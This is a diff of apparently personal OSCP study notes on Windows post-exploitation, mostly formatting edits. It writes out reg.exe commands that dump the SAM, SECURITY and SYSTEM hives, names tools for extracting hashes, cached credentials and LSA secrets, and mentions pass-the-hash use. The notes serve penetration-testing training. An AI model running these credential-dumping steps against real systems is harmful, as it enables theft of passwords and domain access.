Spl1nt3r-Repo/oscp-notes/Loot.md

 ### Loot hives without tools

-This might be a better technique than using tools like wce and fgdump, since you don't have to upload any binaries.
+This might be a better technique than using tools like `wce` and `fgdump`, since you don't have to upload any binaries.
 Get the registry:
 ```
 C:\> reg.exe save hklm\sam c:\windows\temp\sam.save
 C:\> reg.exe save hklm\security c:\windows\temp\security.save
 C:\> reg.exe save hklm\system c:\windows\temp\system.save
 ```

-The hashes can be extracted using `secretdump.py` or `pwdump`
+The hashes can be extracted using `secretdump.py` or `pwdump`.

 ### Dump cached credentials

 ```
-root@kali:~# cachedump
 usage: /usr/bin/cachedump <system hive> <security hive>
 ```

 ### Dump LSA secrets

 ```
-root@kali:~# lsadump
 usage: /usr/bin/lsadump <system hive> <security hive>
 ```

 Here, you will find account passwords for services that are set to run under actual Windows user accounts (as opposed to Local System, Network Service and Local Service), the auto-logon password and more.

 If the Windows host is part of a domain, you will find the domain credentials of the machine account with which you can authenticate to the domain to list domain users and admins as well as browsing shares and so on.

+**How to use credentials**

 Use [pth](http://code.google.com/p/passing-the-hash/) on Kali Linux or [wce](http://www.ampliasecurity.com/research/wcefaq.html) on your own Windows system to use these credentials.